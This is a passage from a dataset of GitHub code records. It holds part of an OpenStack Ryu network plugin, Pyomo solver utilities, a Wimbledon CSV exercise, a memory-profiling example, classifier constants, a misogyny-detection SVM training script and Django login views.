options.update({\"reconnect_interval\": reconnect_interval})\n db.configure_db(options)\n\n self.tunnel_key = db_api_v2.TunnelKey(\n cfg.CONF.OVS.tunnel_key_min, cfg.CONF.OVS.tunnel_key_max)\n ofp_con_host = cfg.CONF.OVS.openflow_controller\n ofp_api_host = cfg.CONF.OVS.openflow_rest_api\n\n if ofp_con_host is None or ofp_api_host is None:\n raise q_exc.Invalid(_('invalid configuration. check ryu.ini'))\n\n hosts = [(ofp_con_host, ofp_service_type.CONTROLLER),\n (ofp_api_host, ofp_service_type.REST_API)]\n db_api_v2.set_ofp_servers(hosts)\n\n self.client = client.OFPClient(ofp_api_host)\n self.tun_client = client.TunnelClient(ofp_api_host)\n for nw_id in rest_nw_id.RESERVED_NETWORK_IDS:\n if nw_id != rest_nw_id.NW_ID_UNKNOWN:\n self.client.update_network(nw_id)\n self._setup_rpc()\n\n # register known all network list on startup\n self._create_all_tenant_network()\n\n def _setup_rpc(self):\n self.conn = rpc.create_connection(new=True)\n self.callback = DhcpRpcCallbackMixin()\n self.dispatcher = dispatcher.RpcDispatcher([self.callback])\n self.conn.create_consumer(topics.PLUGIN, self.dispatcher, fanout=False)\n self.conn.consume_in_thread()\n\n def _create_all_tenant_network(self):\n for net in db_api_v2.network_all_tenant_list():\n self.client.update_network(net.id)\n for tun in self.tunnel_key.all_list():\n self.tun_client.update_tunnel_key(tun.network_id, tun.tunnel_key)\n session = db.get_session()\n for port_binding in db_api_v2.port_binding_all_list(session):\n network_id = port_binding.network_id\n dpid = port_binding.dpid\n port_no = port_binding.port_no\n try:\n port = session.query(models_v2.Port).filter(\n models_v2.Port.id == port_binding.port_id).one()\n except orm_exc.NoResultFound:\n continue\n except orm_exc.MultipleResultsFound:\n continue\n\n self.client.update_port(network_id, dpid, port_no)\n self.client.update_mac(network_id, dpid, port_no, port.mac_address)\n\n def _client_create_network(self, net_id, tunnel_key):\n self.client.create_network(net_id)\n self.tun_client.create_tunnel_key(net_id, tunnel_key)\n\n def _client_delete_network(self, net_id):\n client.ignore_http_not_found(\n lambda: self.client.delete_network(net_id))\n client.ignore_http_not_found(\n lambda: 
self.tun_client.delete_tunnel_key(net_id))\n\n def create_network(self, context, network):\n session = context.session\n with session.begin(subtransactions=True):\n net = super(RyuQuantumPluginV2, self).create_network(context,\n network)\n self._process_l3_create(context, network['network'], net['id'])\n self._extend_network_dict_l3(context, net)\n\n tunnel_key = self.tunnel_key.allocate(session, net['id'])\n try:\n self._client_create_network(net['id'], tunnel_key)\n except:\n self._client_delete_network(net['id'])\n raise\n\n return net\n\n def update_network(self, context, id, network):\n session = context.session\n with session.begin(subtransactions=True):\n net = super(RyuQuantumPluginV2, self).update_network(context, id,\n network)\n self._process_l3_update(context, network['network'], id)\n self._extend_network_dict_l3(context, net)\n return net\n\n def delete_network(self, context, id):\n self._client_delete_network(id)\n session = context.session\n with session.begin(subtransactions=True):\n self.tunnel_key.delete(session, id)\n super(RyuQuantumPluginV2, self).delete_network(context, id)\n\n def get_network(self, context, id, fields=None):\n net = super(RyuQuantumPluginV2, self).get_network(context, id, None)\n self._extend_network_dict_l3(context, net)\n return self._fields(net, fields)\n\n def get_networks(self, context, filters=None, fields=None):\n nets = super(RyuQuantumPluginV2, self).get_networks(context, filters,\n None)\n for net in nets:\n self._extend_network_dict_l3(context, net)\n nets = self._filter_nets_l3(context, nets, filters)\n\n return [self._fields(net, fields) for net in nets]\n\n def delete_port(self, context, id, l3_port_check=True):\n with context.session.begin(subtransactions=True):\n port = self._get_port(context, id)\n net_id = port.network_id\n try:\n port_binding = db_api_v2.port_binding_destroy(context.session,\n port.id, net_id)\n datapath_id = port_binding.dpid\n port_no = port_binding.port_no\n ignore_http_not_found(\n lambda: self.client.delete_port(net_id, datapath_id,\n port_no))\n except q_exc.PortNotFound:\n pass\n\n # if needed, check to see if this is a port owned by\n # and l3-router. 
If so, we should prevent deletion.\n if l3_port_check:\n self.prevent_l3_port_deletion(context, id)\n self.disassociate_floatingips(context, id)\n return super(RyuQuantumPluginV2, self).delete_port(context, id)\n\n def update_port(self, context, id, port):\n p = super(RyuQuantumPluginV2, self).update_port(context, id, port)\n net_id = p['network_id']\n mac_address = p['mac_address']\n\n deleted = port['port'].get('deleted', False)\n if deleted:\n session = context.session\n try:\n db_api_v2.port_binding_destroy(session, id, net_id)\n except q_exc.PortNotFound:\n pass\n db_api_v2.set_port_status(session, id, q_const.PORT_STATUS_DOWN)\n return p\n\n datapath_id = port['port'].get('datapath_id', None)\n port_no = port['port'].get('port_no', None)\n if datapath_id is None or port_no is None:\n LOG.debug('p %s', p)\n return p\n\n try:\n port_binding = db_api_v2.port_binding_get(id, net_id)\n except orm_exc.NoResultFound:\n try:\n db_api_v2.port_binding_create(id, net_id, datapath_id, port_no)\n except IntegrityError:\n # TODO:XXX should do transaction?\n return p\n else:\n self.client.create_port(net_id, datapath_id, port_no)\n self.client.create_mac(net_id, datapath_id, port_no,\n mac_address)\n else:\n if (port_binding.dpid != datapath_id or\n port_binding.port_no != port_no):\n variables = {'datapath_id': datapath_id,\n 'port_no': port_no,\n 'port_binding_dpid': port_binding.dpid,\n 'port_binding_port_no': port_binding.port_no}\n raise q_exc.InvalidInput(\n error_message=_('invalid (datapath_id, port_no) '\n 'is requested '\n '(%(datapath_id)s, %(port_no)s), actual '\n '(%(port_binding_dpid)s, '\n '%(port_binding_port_no)s)') % variables)\n self.client.update_network(net_id)\n self.client.update_port(net_id, datapath_id, port_no)\n self.client.update_mac(net_id, datapath_id, port_no, mac_address)\n return p\n","repo_name":"virt2x/folsomCloud","sub_path":"cloud/quantum/quantum/plugins/ryu/ryu_quantum_plugin.py","file_name":"ryu_quantum_plugin.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
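`delete_port()` above wraps REST calls in `ignore_http_not_found(lambda: ...)` so that deleting an already-gone resource is not treated as fatal. A generic version of that pattern (my helper, for illustration; not the actual ryu implementation):

```python
# Generic "ignore one expected failure" pattern, as used above with
# client.ignore_http_not_found. Hypothetical helper, not from ryu.
def ignore_exception(exc_type, thunk):
    try:
        return thunk()
    except exc_type:
        return None  # the specific failure is expected and swallowed

ignore_exception(KeyError, lambda: {}.pop("missing"))  # no raise, returns None
```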
+{"seq_id":"29699440561","text":"\"\"\"Utility functions and classes for the GDPopt solver.\"\"\"\nfrom __future__ import division\n\nimport logging\nfrom math import fabs, floor, log\n\nfrom pyomo.core import (Any, Binary, Block, Constraint, NonNegativeReals,\n Objective, Reals, Var, minimize, value)\nfrom pyomo.core.expr import current as EXPR\nfrom pyomo.core.kernel import ComponentSet\nfrom pyomo.gdp import Disjunct, Disjunction\nfrom pyomo.opt import SolverFactory\nfrom pyomo.opt.results import ProblemSense, SolverResults\n\n\nclass _DoNothing(object):\n \"\"\"Do nothing, literally.\n\n This class is used in situations of \"do something if attribute exists.\"\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n pass\n\n def __call__(self, *args, **kwargs):\n pass\n\n def __getattr__(self, attr):\n def _do_nothing(*args, **kwargs):\n pass\n return _do_nothing\n\n\nclass GDPoptSolveData(object):\n \"\"\"Data container to hold solve-instance data.\n\n Key attributes:\n - original_model: the original model that the user gave us to solve\n - working_model: the original model after preprocessing\n - linear_GDP: the linear-discrete master problem\n\n \"\"\"\n pass\n\n\ndef model_is_valid(solve_data, config):\n \"\"\"Validate that the model is solveable by GDPopt.\n\n Also preforms some preprocessing such as moving the objective to the\n constraints.\n\n \"\"\"\n m = solve_data.working_model\n GDPopt = m.GDPopt_utils\n\n # Handle LP/NLP being passed to the solver\n prob = solve_data.results.problem\n if (prob.number_of_binary_variables == 0 and\n prob.number_of_integer_variables == 0 and\n prob.number_of_disjunctions == 0):\n config.logger.info('Problem has no discrete decisions.')\n if len(GDPopt.working_nonlinear_constraints) > 0:\n config.logger.info(\n \"Your model is an NLP (nonlinear program). \"\n \"Using NLP solver %s to solve.\" % config.nlp)\n SolverFactory(config.nlp).solve(\n solve_data.original_model, **config.nlp_options)\n return False\n else:\n config.logger.info(\n \"Your model is an LP (linear program). \"\n \"Using LP solver %s to solve.\" % config.mip)\n SolverFactory(config.mip).solve(\n solve_data.original_model, **config.mip_options)\n return False\n\n # Handle missing or multiple objectives\n objs = list(m.component_data_objects(\n ctype=Objective, active=True, descend_into=True))\n num_objs = len(objs)\n solve_data.results.problem.number_of_objectives = num_objs\n if num_objs == 0:\n config.logger.warning(\n 'Model has no active objectives. Adding dummy objective.')\n GDPopt.dummy_objective = Objective(expr=1)\n main_obj = GDPopt.dummy_objective\n elif num_objs > 1:\n raise ValueError('Model has multiple active objectives.')\n else:\n main_obj = objs[0]\n solve_data.working_objective_expr = main_obj.expr\n\n # Move the objective to the constraints\n\n # TODO only move the objective if nonlinear?\n GDPopt.objective_value = Var(domain=Reals, initialize=0)\n solve_data.objective_sense = main_obj.sense\n if main_obj.sense == minimize:\n GDPopt.objective_expr = Constraint(\n expr=GDPopt.objective_value >= main_obj.expr)\n solve_data.results.problem.sense = ProblemSense.minimize\n else:\n GDPopt.objective_expr = Constraint(\n expr=GDPopt.objective_value <= main_obj.expr)\n solve_data.results.problem.sense = ProblemSense.maximize\n main_obj.deactivate()\n GDPopt.objective = Objective(\n expr=GDPopt.objective_value, sense=main_obj.sense)\n\n # TODO if any continuous variables are multipled with binary ones, need\n # to do some kind of transformation (Glover?) 
or throw an error message\n return True\n\n\ndef a_logger(str_or_logger):\n \"\"\"Returns a logger when passed either a logger name or logger object.\"\"\"\n if isinstance(str_or_logger, logging.Logger):\n return str_or_logger\n else:\n return logging.getLogger(str_or_logger)\n\n\ndef copy_var_list_values(from_list, to_list, config, skip_stale=False):\n \"\"\"Copy variable values from one list to another.\"\"\"\n for v_from, v_to in zip(from_list, to_list):\n if skip_stale and v_from.stale:\n continue # Skip stale variable values.\n try:\n v_to.set_value(value(v_from, exception=False))\n if skip_stale:\n v_to.stale = False\n except ValueError as err:\n if 'is not in domain Binary' in err.message:\n # Check to see if this is just a tolerance issue\n v_from_val = value(v_from, exception=False)\n if (fabs(v_from_val - 1) <= config.integer_tolerance or\n fabs(v_from_val) <= config.integer_tolerance):\n v_to.set_value(round(v_from_val))\n else:\n raise\n\n\ndef is_feasible(model, config):\n \"\"\"Checks to see if the algebraic model is feasible in its current state.\n\n Checks variable bounds and active constraints. Not for use with\n untransformed GDP models.\n\n \"\"\"\n disj = next(model.component_data_objects(\n ctype=Disjunct, active=True), None)\n if disj is not None:\n raise NotImplementedError(\n \"Found active disjunct %s. \"\n \"This function is not intended to check \"\n \"feasibility of disjunctive models, \"\n \"only transformed subproblems.\" % disj.name)\n\n config.logger.debug('Checking if model is feasible.')\n for constr in model.component_data_objects(\n ctype=Constraint, active=True, descend_into=True):\n # Check constraint lower bound\n if (constr.lower is not None and (\n value(constr.lower) - value(constr.body)\n >= config.constraint_tolerance\n )):\n config.logger.info('%s: body %s < LB %s' % (\n constr.name, value(constr.body), value(constr.lower)))\n return False\n # check constraint upper bound\n if (constr.upper is not None and (\n value(constr.body) - value(constr.upper)\n >= config.constraint_tolerance\n )):\n config.logger.info('%s: body %s > UB %s' % (\n constr.name, value(constr.body), value(constr.upper)))\n return False\n for var in model.component_data_objects(ctype=Var, descend_into=True):\n # Check variable lower bound\n if (var.has_lb() and\n value(var.lb) - value(var) >= config.variable_tolerance):\n config.logger.info('%s: %s < LB %s' % (\n var.name, value(var), value(var.lb)))\n return False\n # Check variable upper bound\n if (var.has_ub() and\n value(var) - value(var.ub) >= config.variable_tolerance):\n config.logger.info('%s: %s > UB %s' % (\n var.name, value(var), value(var.ub)))\n return False\n config.logger.info('Model is feasible.')\n return True\n\n\ndef clone_orig_model_with_lists(original_model):\n \"\"\"Clones the original model to create a working model.\n\n Also attaches ordered lists of the variables, constraints, disjuncts, and\n disjunctions to the model so that they can be used for mapping back and\n forth.\n\n \"\"\"\n build_ordered_component_lists(original_model, prefix='orig')\n return original_model.clone()\n\n\ndef build_ordered_component_lists(model, prefix='working'):\n \"\"\"Define lists used for future data transfer.\"\"\"\n GDPopt = model.GDPopt_utils\n var_set = ComponentSet()\n setattr(\n GDPopt, '%s_constraints_list' % prefix, list(\n model.component_data_objects(\n ctype=Constraint, active=True,\n descend_into=(Block, Disjunct))))\n setattr(\n GDPopt, '%s_disjuncts_list' % prefix, list(\n model.component_data_objects(\n 
ctype=Disjunct, descend_into=(Block, Disjunct))))\n setattr(\n GDPopt, '%s_disjunctions_list' % prefix, list(\n model.component_data_objects(\n ctype=Disjunction, active=True,\n descend_into=(Disjunct, Block))))\n\n # Identify the non-fixed variables in (potentially) active constraints\n for constr in getattr(GDPopt, '%s_constraints_list' % prefix):\n for v in EXPR.identify_variables(constr.body, include_fixed=False):\n var_set.add(v)\n # Disjunct indicator variables might not appear in active constraints. In\n # fact, if we consider them Logical variables, they should not appear in\n # active algebraic constraints. For now, they need to be added to the\n # variable set.\n for disj in getattr(GDPopt, '%s_disjuncts_list' % prefix):\n var_set.add(disj.indicator_var)\n\n # We use component_data_objects rather than list(var_set) in order to\n # preserve a deterministic ordering.\n setattr(\n GDPopt, '%s_var_list' % prefix, list(\n v for v in model.component_data_objects(\n ctype=Var, descend_into=(Block, Disjunct))\n if v in var_set))\n setattr(\n GDPopt, '%s_nonlinear_constraints' % prefix, [\n v for v in getattr(GDPopt, '%s_constraints_list' % prefix)\n if v.body.polynomial_degree() not in (0, 1)])\n\n\ndef record_original_model_statistics(solve_data, config):\n \"\"\"Record problem statistics for original model and setup SolverResults.\"\"\"\n # Create the solver results object\n res = solve_data.results = SolverResults()\n prob = res.problem\n origGDPopt = solve_data.original_model.GDPopt_utils\n res.problem.name = solve_data.working_model.name\n res.problem.number_of_nonzeros = None # TODO\n # TODO work on termination condition and message\n res.solver.termination_condition = None\n res.solver.message = None\n # TODO add some kind of timing\n res.solver.user_time = None\n res.solver.system_time = None\n res.solver.wallclock_time = None\n res.solver.termination_message = None\n\n # Classify the variables\n orig_binary = sum(1 for v in origGDPopt.orig_var_list if v.is_binary())\n orig_continuous = sum(\n 1 for v in origGDPopt.orig_var_list if v.is_continuous())\n orig_integer = sum(1 for v in origGDPopt.orig_var_list if v.is_integer())\n\n # Get count of constraints and variables\n prob.number_of_constraints = len(origGDPopt.orig_constraints_list)\n prob.number_of_disjunctions = len(origGDPopt.orig_disjunctions_list)\n prob.number_of_variables = len(origGDPopt.orig_var_list)\n prob.number_of_binary_variables = orig_binary\n prob.number_of_continuous_variables = orig_continuous\n prob.number_of_integer_variables = orig_integer\n\n config.logger.info(\n \"Original model has %s constraints (%s nonlinear) \"\n \"and %s disjunctions, \"\n \"with %s variables, of which %s are binary, %s are integer, \"\n \"and %s are continuous.\" %\n (prob.number_of_constraints,\n len(origGDPopt.orig_nonlinear_constraints),\n prob.number_of_disjunctions,\n prob.number_of_variables,\n orig_binary,\n orig_integer,\n orig_continuous))\n\n\ndef record_working_model_statistics(solve_data, config):\n \"\"\"Record problem statistics for preprocessed model.\"\"\"\n GDPopt = solve_data.working_model.GDPopt_utils\n now_binary = sum(1 for v in GDPopt.working_var_list if v.is_binary())\n now_continuous = sum(\n 1 for v in GDPopt.working_var_list if v.is_continuous())\n now_integer = sum(1 for v in GDPopt.working_var_list if v.is_integer())\n assert now_integer == 0, \"Unreformulated, unfixed integer variables found.\"\n\n config.logger.info(\n \"After preprocessing, model has %s constraints (%s nonlinear) \"\n \"and %s 
disjunctions, \"\n \"with %s variables, of which %s are binary and %s are continuous.\" %\n (len(GDPopt.working_constraints_list),\n len(GDPopt.working_nonlinear_constraints),\n len(GDPopt.working_disjunctions_list),\n len(GDPopt.working_var_list),\n now_binary,\n now_continuous))\n\n\ndef reformulate_integer_variables(model, config):\n integer_vars = list(\n v for v in model.component_data_objects(\n ctype=Var, descend_into=(Block, Disjunct))\n if v.is_integer() and not v.fixed)\n if len(integer_vars) == 0:\n return # if no free integer variables, no reformulation needed.\n\n if config.reformulate_integer_vars_using is None:\n config.logger.warning(\n \"Model contains unfixed integer variables. \"\n \"GDPopt will reformulate using base 2 binary variables \"\n \"by default. To specify a different method, see the \"\n \"reformulate_integer_vars_using configuration option.\")\n config.reformulate_integer_vars_using = 'base2_binary'\n\n config.logger.info(\n \"Reformulating integer variables using the %s strategy.\"\n % config.reformulate_integer_vars_using)\n\n # Set up reformulation block\n reform_block = model.GDPopt_utils.integer_reform = Block(\n doc=\"Holds variables and constraints for reformulating \"\n \"integer variables to binary variables.\")\n reform_block.new_binary_var = Var(\n Any, domain=Binary, dense=False,\n doc=\"Binary variable with index (int_var.name, indx)\")\n reform_block.integer_to_binary_constraint = Constraint(\n Any, doc=\"Equality constraints mapping the binary variable values \"\n \"to the integer variable value.\")\n\n # check that variables are bounded and non-negative\n for int_var in integer_vars:\n if not (int_var.has_lb() and int_var.has_ub()):\n raise ValueError(\n \"Integer variable %s is missing an \"\n \"upper or lower bound. LB: %s; UB: %s. \"\n \"GDPopt does not support unbounded integer variables.\"\n % (int_var.name, int_var.lb, int_var.ub))\n if int_var.lb < 0:\n raise ValueError(\n \"Integer variable %s can be negative. \"\n \"GDPopt currently only supports positive integer \"\n \"variables.\" % (int_var.name)\n )\n # do the reformulation\n highest_power = floor(log(value(int_var.ub), 2))\n var_name = int_var.name\n reform_block.integer_to_binary_constraint.add(\n var_name, expr=int_var == sum(\n reform_block.new_binary_var[var_name, pwr] * (2 ** pwr)\n for pwr in range(0, int(highest_power) + 1)))\n int_var.domain = NonNegativeReals\n\n config.logger.info(\n \"Reformulated %s integer variables using \"\n \"%s binary variables and %s constraints.\"\n % (len(integer_vars), len(reform_block.new_binary_var),\n len(reform_block.integer_to_binary_constraint)))\n\n\ndef validate_disjunctions(model, config):\n \"\"\"Validate that the active disjunctions on the model are satisfied\n by the current disjunct indicator_var values.\"\"\"\n active_disjunctions = model.component_data_objects(\n ctype=Disjunction, active=True, descend_into=(Block, Disjunct))\n for disjtn in active_disjunctions:\n sum_disj_vals = sum(disj.indicator_var.value\n for disj in disjtn.disjuncts)\n if disjtn.xor and fabs(sum_disj_vals - 1) > config.integer_tolerance:\n raise ValueError(\n \"Expected disjunct values to add up to 1 \"\n \"for XOR disjunction %s. \"\n \"Instead, values add up to %s.\" % (disjtn.name, sum_disj_vals))\n elif sum_disj_vals + config.integer_tolerance < 1:\n raise ValueError(\n \"Expected disjunct values to add up to at least 1 for \"\n \"OR disjunction %s. 
\"\n \"Instead, values add up to %s.\" % (disjtn.name, sum_disj_vals))\n\n\ndef algorithm_is_making_progress(solve_data, config):\n \"\"\"Make sure that the algorithm is making sufficient progress\n at each iteration to continue.\"\"\"\n\n # TODO if backtracking is turned on, and algorithm visits the same point\n # twice without improvement in objective value, turn off backtracking.\n\n # TODO stop iterations if feasible solutions not progressing for a number\n # of iterations.\n\n # If the hybrid algorithm is not making progress, switch to OA.\n # required_feas_prog = 1E-6\n # if solve_data.working_model.GDPopt_utils.objective.sense == minimize:\n # sign_adjust = 1\n # else:\n # sign_adjust = -1\n\n # Maximum number of iterations in which feasible bound does not\n # improve before terminating algorithm\n # if (len(feas_prog_log) > config.algorithm_stall_after and\n # (sign_adjust * (feas_prog_log[-1] + required_feas_prog)\n # >= sign_adjust *\n # feas_prog_log[-1 - config.algorithm_stall_after])):\n # config.logger.info(\n # 'Feasible solutions not making enough progress '\n # 'for %s iterations. Algorithm stalled. Exiting.\\n'\n # 'To continue, increase value of parameter '\n # 'algorithm_stall_after.'\n # % (config.algorithm_stall_after,))\n # return False\n\n return True\n\n\ndef algorithm_should_terminate(solve_data, config):\n \"\"\"Check if the algorithm should terminate.\n\n Termination conditions based on solver options and progress.\n\n \"\"\"\n # Check bound convergence\n if solve_data.LB + config.bound_tolerance >= solve_data.UB:\n config.logger.info(\n 'GDPopt exiting on bound convergence. '\n 'LB: %s + (tol %s) >= UB: %s' %\n (solve_data.LB, config.bound_tolerance,\n solve_data.UB))\n return True\n\n # Check iteration limit\n if solve_data.master_iteration >= config.iterlim:\n config.logger.info(\n 'GDPopt unable to converge bounds '\n 'after %s master iterations.'\n % (solve_data.master_iteration,))\n config.logger.info(\n 'Final bound values: LB: %s UB: %s'\n % (solve_data.LB, solve_data.UB))\n return True\n\n if not algorithm_is_making_progress(solve_data, config):\n config.logger.debug(\n 'Algorithm is not making enough progress. '\n 'Exiting iteration loop.')\n return True\n return False\n\n\ndef copy_and_fix_mip_values_to_nlp(var_list, val_list, config):\n \"\"\"Copy MIP solution values to the corresponding NLP variable list.\n\n Fix binary variables and optionally round their values.\n\n \"\"\"\n for var, val in zip(var_list, val_list):\n if val is None:\n continue\n if not var.is_binary():\n var.value = val\n elif ((fabs(val) > config.integer_tolerance and\n fabs(val - 1) > config.integer_tolerance)):\n raise ValueError(\n \"Binary variable %s value %s is not \"\n \"within tolerance %s of 0 or 1.\" %\n (var.name, var.value, config.integer_tolerance))\n else:\n # variable is binary and within tolerances\n if config.round_NLP_binaries:\n var.fix(int(round(val)))\n else:\n var.fix(val)\n","repo_name":"rowhit/pyomo","sub_path":"pyomo/contrib/gdpopt/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":19207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"14744232404","text":"# Game, Set, Match\n\n\nimport csv\n\n\ndef main():\n # Read the CSV file\n data = read_csv_file(\"wimbledon.csv\")\n\n # Get the champions and the number of times they have won\n champions = get_champions(data)\n\n # Display the champions and the number of times they have won\n print(\"Wimbledon Champions:\")\n for name, count in champions.items():\n print(f\"{name} {count}\")\n\n # Get the countries of the champions\n countries = get_countries(data)\n\n # Display the countries of the champions in alphabetical order\n print(\"\\nThese\", len(countries), \"countries have won Wimbledon:\")\n print(\", \".join(sorted(countries)))\n\n\ndef read_csv_file(filename):\n \"\"\"\n Reads a CSV file and returns its contents as a list of lists.\n \"\"\"\n with open(filename, \"r\", encoding=\"utf-8-sig\") as in_file:\n reader = csv.reader(in_file)\n return [row for row in reader]\n\n\ndef get_champions(data):\n \"\"\"\n Returns a dictionary containing the champions and the number of times they have won.\n \"\"\"\n champions = {}\n for row in data:\n if row[0] != \"Year\": # Skip the header row\n name = row[2]\n champions[name] = champions.get(name, 0) + 1\n return champions\n\n\ndef get_countries(data):\n \"\"\"\n Returns a set of the countries of the champions.\n \"\"\"\n countries = set()\n for row in data:\n if row[0] != \"Year\": # Skip the header row\n country = row[1]\n countries.add(country)\n return countries\n\n\nmain()\n","repo_name":"tamil290/CP1404","sub_path":"Practical_5/wimbledon.py","file_name":"wimbledon.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4246647109","text":"\n \n\n# create a random dictionary of words and their definitions\nimport profile\n\n\nports_protocols = {\n \"21\": \"FTP\",\n \"22\": \"SSH\",\n \"23\": \"TELNET\",\n \"25\": \"SMTP\",\n \"53\": \"DNS\",\n \"80\": \"HTTP\",\n \"443\": \"HTTPS\",\n \"3306\": \"MYSQL\",\n \"5432\": \"POSTGRESQL\"}\n\nfrom memory_profiler import profile\nimport timeit\n\n@profile(precision=2)\ndef create_dictionary():\n words = ['apple', 'banana', 'orange', 'coconut', 'strawberry', 'lime', 'grapefruit', 'lemon', 'kumquat', 'blueberry', 'melon']\n dictionary = {}\n for word in words:\n definition = word + \" is a fruit.\"\n dictionary[word] = definition\n return dictionary # return the dictionary\n\n\nprint(timeit.timeit(\"create_dictionary()\", setup=\"from __main__ import create_dictionary\",number=1))\n\n# for x in dict1:\n# print(x, dict1[x])","repo_name":"maxacode/Technical-Interview-Prep-Sites","sub_path":"Individual Functions Practice/memory_profiler.py","file_name":"memory_profiler.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"1148001315","text":"batch_size = 128\nalpha_channels = 3\nwidth = 16\nheight = 16\n\nfilter_height = 5\nfilter_width = filter_height\nconvolutional_channels = 6\nconvolutional_skip = 2\npool_skip = 2\n# from get_bottleneck_data import TOP_CLASSES\n# len(TOP_CLASSES)\nnum_targets = 1623 + 1\nlearning_rate = 0.01\nnum_steps = 5000\n\nnum_bottlenecks = 1001\n","repo_name":"joshbrowning2358/cDiscount","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3937079214","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 19 15:07:16 2018\n\n@author: dadangewp\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nfrom dataReader import parse_training\nfrom dataReader import parse_testing\nimport configFeature as cfgFeature\nimport featureManager\nfrom sklearn import svm\nfrom sklearn import tree\nfrom sklearn import metrics\nfrom sklearn.metrics.scorer import make_scorer\nfrom sklearn.metrics import f1_score, classification_report, accuracy_score, make_scorer\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\n\n\n\nDIR_TRAIN = \"D:\\\\PhD\\\\Misogyny Detection\\\\Evalita\\\\en_training_taskb.tsv\"\nDIR_TEST = \"D:\\\\PhD\\\\Misogyny Detection\\\\Evalita\\\\en_testing_taskb_linear.tsv\"\n\noriginalclass = []\npredictedclass = []\n\ndef classification_report_with_accuracy_score(y_true, y_pred):\n #print (classification_report(y_true, y_pred)) # print classification report\n originalclass.extend(y_true)\n predictedclass.extend(y_pred)\n return accuracy_score(y_true, y_pred) # return accuracy score\n\nif __name__ == '__main__':\n \n print (\"started ...\")\n TASK = \"B-English\" # Define, A or B\n FNAME = './predictions-task' + TASK + '.txt'\n PREDICTIONSFILE = open(FNAME, \"w\")\n # read Training data\n #print (\"load wordvector\")\n #word2vec = gensim.models.KeyedVectors.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True)\n #word2vec = dict(zip(model.wv.index2word, model.wv.syn0))\n #print (\"wordvector load finished\")\n word2vec = \"zonk\"\n feature_manager=featureManager.make_feature_manager()\n dataTrain, dataLabel = parse_training(DIR_TRAIN)\n dataTest = parse_testing(DIR_TEST)\n print (\"Training data read\") \n feature_names=cfgFeature.feature_list['feature_names']\n #stuff = range(0, len(feature_names) )\n #parameters=[]\n #parameters_optimized=[]\n #highest=0\n #max_feature_set=[]\n #for L in range(1, len(stuff)+1):\n #for subset in combinations(stuff, L):\n #X_train,X_test=feature_manager.create_feature_space(dataTrain, word2vec, feature_names[list(subset)], train_tweets=None)\n #clf = svm.LinearSVC()\n #print (\"training start\")\n #clf.fit(X_train, dataLabel)\n #print (\"training done\")\n #scores = cross_val_score(clf, X_train, dataLabel, cv=10) \n #acc = scores.mean()\n #predicted = cross_val_predict(clf,X_train,dataLabel,cv=10)\n #score = metrics.f1_score(dataLabel, predicted, pos_label=1)\n #print(feature_names[list(subset)])\n #print(score)\n #if score > 0.65:\n #print(str(feature_names[list(subset)]))\n #PREDICTIONSFILE.write(str(feature_names[list(subset)])+\";\")\n #print(score)\n #PREDICTIONSFILE.write(str(score))\n #PREDICTIONSFILE.write(\"\\n\")\n X_train, X_test = feature_manager.create_feature_space(dataTrain, dataTest, feature_names)\n #print (X_train.shape)\n #print (X_test.shape)\n clf = svm.LinearSVC()\n clf.fit(X_train,dataLabel)\n \n #print(cross_val_score(clf, X_train, dataLabel, cv=10, scoring=\"accuracy\"))\n scores = cross_val_score(clf, X_train, dataLabel, cv=10, scoring=make_scorer(f1_score, average='macro'))\n print(scores)\n print(\"Accuracy (Cross-V): %0.3f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n #nested_score = cross_val_score(clf, X=X_train, y=dataLabel, cv=10, \\\n # scoring=make_scorer(classification_report_with_accuracy_score))\n #print(classification_report(originalclass, predictedclass, digits=3))\n #predicted = cross_val_predict(clf,X_train,dataLabel,cv=10)\n predicted = clf.predict(X_test)\n #score = metrics.f1_score(labelTest, predicted, 
pos_label=1)\n #scoreTrain = metrics.f1_score(dataLabel, predictedTrain, pos_label=1)\n #print (\"F1-score Task\", TASK, score)\n #print (scoreTrain)\n for p in predicted:\n PREDICTIONSFILE.write(\"{}\\n\".format(p))\n PREDICTIONSFILE.close()\n ","repo_name":"dadangewp/misogyny-project","sub_path":"IberEval_Misogyny-Detection-LinearSVC/misogyny_TaskA.py","file_name":"misogyny_TaskA.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18523130874","text":"from django.shortcuts import render, redirect\nfrom .forms import RegisterForm, LoginForm\nfrom django.contrib.auth import login\nfrom django.contrib.auth import logout\n\n\ndef user_login(request):\n if request.method == \"POST\":\n form = LoginForm(data=request.POST)\n if form.is_valid():\n login(request, form.user_cache)\n return redirect(\"blog:index\")\n else:\n form = LoginForm()\n return render(request, \"login_and_register/login.html\", {\"form\": form})\n\n\ndef user_register(request):\n if request.method == \"POST\":\n form = RegisterForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"login_and_register:login\")\n\n # form.save()\n else:\n form = RegisterForm()\n\n return render(request, \"login_and_register/register.html\", {\"form\": form})\n\n\ndef user_logout(request):\n logout(request)\n return redirect(\"blog:index\")\n\n","repo_name":"radgra/django_blog","sub_path":"login_and_register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
